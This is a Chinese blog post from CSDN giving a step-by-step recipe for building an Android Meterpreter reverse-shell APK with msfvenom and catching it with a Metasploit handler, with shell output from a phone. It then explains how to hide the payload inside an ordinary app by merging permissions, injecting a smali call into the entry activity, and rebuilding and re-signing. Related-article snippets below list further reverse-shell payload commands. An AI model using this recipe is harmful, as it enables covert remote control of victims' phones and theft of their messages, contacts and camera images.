msfvenom生成apk payload然后得到meterpreter shell

最新推荐文章于 2024-04-24 09:45:11 发布
最新推荐文章于 2024-04-24 09:45:11 发布
阅读量4.4k 收藏 22
点赞数 1
分类专栏: android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/caiqiiqi/article/details/84102629
版权

先生成一个payload,带上meterpreter监听的地址和端口:

msfvenom -p android/meterpreter/reverse_tcp LHOST=<your public IP> LPORT=80 -o msf.apk

由于大号端口在我的wifi环境下无法出去,所以这里我设置为80端口。
然后安装这个apk到手机。
注意不要在主机上用nc监听,虽然能收到来自apk的TCP包,但是那只是心跳包,没有数据的。
然后用root权限打开msfconsole(因为要监听在80端口,得用root权限才行),在msf上监听:

use exploit/multi/handler
set LHOST 0.0.0.0
set LPORT 80
set PAYLOAD android/meterpreter/reverse_tcp
exploit

Demo

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
用前置摄像头拍到的照片
在这里插入图片描述
最后不知道做什么了,就用一个android的shell:

meterpreter > shell
Process 1 created.
Channel 1 created.

pwd
/data/data/com.metasploit.stage/files
id
uid=10113(u0_a113) gid=10113(u0_a113) groups=1015(sdcard_rw),1028(sdcard_r),3003(inet),50113(all_a113) context=u:r:untrusted_app:s0
su

pwd
/data/data/com.metasploit.stage/files
ls
cd ..
ls
cache
files
lib
cd lib
ls
cd ../..
ls
opendir failed, Permission denied

参考:https://nestedif.com/android-security/android-reverse-shell-using-metasploit/

将生成的payload整合到正常apk中

  1. 用apktool对msf.apk进行反编译;用apktool对helloworld.apk进行反编译。
  2. 将msf.apk中的AndroidManifest.xml权限加到helloworld.apk的AndroidManifest.xml中。
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>
    <uses-permission android:name="android.permission.CHANGE_WIFI_STATE"/>
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
    <uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/>
    <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
    <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
    <uses-permission android:name="android.permission.SEND_SMS"/>
    <uses-permission android:name="android.permission.RECEIVE_SMS"/>
    <uses-permission android:name="android.permission.RECORD_AUDIO"/>
    <uses-permission android:name="android.permission.CALL_PHONE"/>
    <uses-permission android:name="android.permission.READ_CONTACTS"/>
    <uses-permission android:name="android.permission.WRITE_CONTACTS"/>
    <uses-permission android:name="android.permission.RECORD_AUDIO"/>
    <uses-permission android:name="android.permission.WRITE_SETTINGS"/>
    <uses-permission android:name="android.permission.CAMERA"/>
    <uses-permission android:name="android.permission.READ_SMS"/>
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
    <uses-permission android:name="android.permission.SET_WALLPAPER"/>
    <uses-permission android:name="android.permission.READ_CALL_LOG"/>
    <uses-permission android:name="android.permission.WRITE_CALL_LOG"/>
    <uses-permission android:name="android.permission.WAKE_LOCK"/>
  1. 将apktool得到的smali目录下的所有文件复制到helloworld.apk的smali目录下。
  2. 然后找到原apk中的入口Activity的onCreate()方法:
    在这里插入图片描述
    在其下面一行加入:
invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
  1. 回编译:
apktool b helloworld(使用apktool反编译helloworld.apk生成的目录)

在helloworld/dist目录会得到一个apk。
6. 此时得到的apk是没有签名的,需要用jarsigner对其签名。(如果没有keystore文件,可以用命令先生成一个)

jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore C:\Users\caiqiqi\cqq.keystore E:\BaiduNetdiskDownload\apktool\helloworld\dist\helloworld.apk cqq

签名之后会覆盖原始的helloworld.apk。

参考:https://www.blackhillsinfosec.com/embedding-meterpreter-in-android-apk/
自动化脚本:https://github.com/yoda66/AndroidEmbedIT/blob/master/android_embedit.py

Demo

caiqiiqi
关注
  • 1
    点赞
  • 22
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
msfvenom生成android,msfvenom各平台payload生成
weixin_27918373的博客
05-28 843
二进制windowsmsfvenom -p windows/meterpreter/reverse_tcp LHOST=10.211.55.2 LPORT=3333 -a x86 --platform Windows -f exe >shell.exemsfvenom-p windows/x64/meterpreter/reverse_tcp LHOST=10.211.55.2 LPORT=...
msfvenom生成android,msfvenom 常用生成 payload 命令
weixin_30386401的博客
05-28 451
8种机械键盘轴体对比本人程序员,要买一个写代码的键盘,请问红轴和茶轴怎么选?使用msfvenom -h命令查看所有参数常用参数:12345-p 设置 payload-e 设置编码方式-a 系统结构,默认x86-f 生成文件格式-o 保存 payloadWindowsmsfvenom -p windows/meterpreter/reverse_tcp LHOST=LPORT=...
Msfvenom生成木马实验
最新发布
m0_74025111的博客
04-24 919
编码处理型:msfvenom -p <payload> <payload options> -a <arch> --platform <platform> -e <encoder option> -i <encoder times> -b <bad-chars> -n <nopsled> -f <format> -o <path>/root/Desktop /putty.exe -k -f exe -o /tmp/putty_evil.exe生成伪装木马,将payload
msfvenomapk注入payload
weixin_30569001的博客
06-07 557
首先安装apt-get install apkinjector 这个东西,msfvenom重新组装apk的时候会自动调用 msfvenom -x /路径/apk android/meterpreter/reverse_tcp LHOST=<ip> LPORT=<端口> -o /存放路径/注入成功的apk名字 开启监听 halder模块 set PAYLOAD and...
简单记录自己利用meterpreter入侵安卓机
weixin_44731948的博客
01-16 1155
简单记录自己利用meterpreter入侵安卓机 需要准备 一台安卓机 安装kali Linux系统 入侵流程 kali终端执行 msfvenom -p android/meterpreter/reverse_tcp lhost=(kali linux的IP地址) lport=5555 R>/root/a.apk可以看到在root目录下生成了a.apk文件 将apk文件发送到安卓手机(方式自行选择,此处可扩展) 手机安装apk,为了测试成功,还需根据测试目的授予相应权限 kali
Kali 2021:用Metasploit实验入侵自己的安卓手机
weixin_52221158的博客
07-19 9885
报错详细解决
msfvenom常用生成payload命令(第十课).docx
09-15
MSFVenom Payload 生成命令详解 MSFVenom 是 Metasploit Framework 中的一个组件,用于生成 PayloadPayload 是攻击者在攻击目标系统时使用的恶意代码。MSFVenom 提供了多种 Payload 生成方式,包括 Windows、Mac...
msfvenom常用生成payload命令(第十课)1
08-03
专注APT攻击与防御msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp LHOST=攻击机I
msfvenom获取shell
01-03
msfvenom各平台生成木马大全: windows: msfvenom -a x86 –platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -b ‘x00x0axff’ -i 3 -f exe -opayload....
MeterPwrShell:生成Powershell Oneliner的自动化工具,可以在Metasploit,Bypass AMSI,Bypass防火墙和FUD上创建Meterpreter Shell
03-20
生成Powershell Oneliner的自动化工具,可以在Metasploit,Bypass AMSI,Bypass防火墙和FUD上创建Meterpreter Shell 此工具由 , 和 重要的提示 切勿将本程序产生的有效负载上传到任何在线扫描仪 切勿将此程序用于...
E025-渗透测试常用工具-使用msfvenom生成木马进行渗透测试.pdf
12-02
`msfvenom`是Metasploit框架的一部分,是一个强大的工具,可以生成各种类型的恶意软件payload,用于渗透测试。以下是对`msfvenom`的详细解释以及如何使用它生成木马进行渗透测试。 首先,`msfvenom`允许测试者创建...
Kali--meterpreter找不到shell选项meterpreter > shell [-] Unknown command: shell.
齐泽文的Blog
04-22 1万+
今天在使用kali进行学习是,发现在进入meterpreter控制台后只有core命令,刚开始以为是虚拟机坏掉了,后来发现,是因为没有连接成功,1.问题重现:root@qzwhost:~# msfconsole _ ...
安卓手机渗透测试
11-04
移动安全是当下最热门的话题之一。安卓系统最为市场上占有量最高的移动操作系统,拥有极其广泛的用户基础,大量的个人数据和商业数据都存储在安卓移动设备上。本专栏将从最基础的实验环境搭建,软件安装使用开始讲。没有复杂的原理讲解,更多的实践操作,小白也能跟着从零开始学起。注意:本教程内容仅用于网络安全学习研究,未经授权的入侵需要自己承担相应的责任,与作者无关。
利用MSF攻击Android
qq_45746768的博客
07-08 3804
利用Metasploit攻击Android
msfvenom常用参数
m0_61506558的博客
08-29 1537
列出指定模块的所有可用资源,模块类型包括: payloads, encoders, nops, all。例如:原先有个正常文件normal.exe 可以通过这个选项把后门捆绑到这个程序上面。例如:原先有个正常文件normal.exe 可以通过这个选项把后门捆绑到这个程序上面。设定有效攻击荷载的最大长度生成payload的最大长度,就是文件大小。保护模板程序的动作,注入的payload作为一个新的进程运行。指定需要使用的encoder(编码器)编码免杀。指定需要使用的payload(攻击荷载)。...
Kali环境使用Metasploit生成木马入侵安卓手机
热门推荐
zhaghailiangji的博客
02-27 2万+
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。环境准备:Kali2.0(msfVENOM、metasploit)安卓手机或安卓模拟器利用过程:先查看本地IP...
msf生成木马攻击android手机
afei001
03-21 6619
实验环境 攻击机:kali IP:192.168.43.5 靶机:oppor9st 生成木马攻击android手机 1.在kali上生成反弹木马 root@afei:~# msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.43.5 lport=6666 R > hello.apk [...
6.Metasploit生成apk攻击Android实例
weixin_30417487的博客
07-03 575
Metasploit进阶第四讲生成Android apk文件 01 msfvenom基本参数 msfvenom介绍 承接上回,staged/unstage payload如何利用? msfvenom是msfpayload及msfencode的结合体,可利用msfvenompayload封装为木马程序,并在目标机上执行,在本地监听上线。 msfvenom基本...
msf生成反弹shell
08-28
你可以使用Metasploit Framework (MSF)来生成一个反弹shell。这里有一个示例,展示如何使用MSF生成一个反弹到攻击者机器的shell: 1. 首先,启动Metasploit Framework控制台。在终端中输入 `msfconsole` 并按下回车。 2. 输入以下命令来查找可用的Payload: ``` search payload/windows/shell_reverse_tcp ``` 3. 选择一个适合的Payload并记下其Payload编号。 4. 设置Payload选项。使用 `use` 命令加上Payload编号,例如: ``` use windows/shell_reverse_tcp ``` 5. 设置Payload的必要参数。使用 `set` 命令加上参数名和值来设置,例如: ``` set LHOST <攻击者机器的IP地址> set LPORT <监听端口号> ``` 6. 启动监听器。使用 `exploit` 命令来启动监听器并等待目标主机连接。 ``` exploit ``` 7. 当目标主机与你的监听器连接时,你将收到一个反弹到攻击者机器的shell。 请注意,上述步骤只是简单介绍了如何使用MSF生成反弹shell,实际操作需要更多的细节和配置。确保你在合法的环境中进行这些操作,并遵循所有法律和道德准则。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值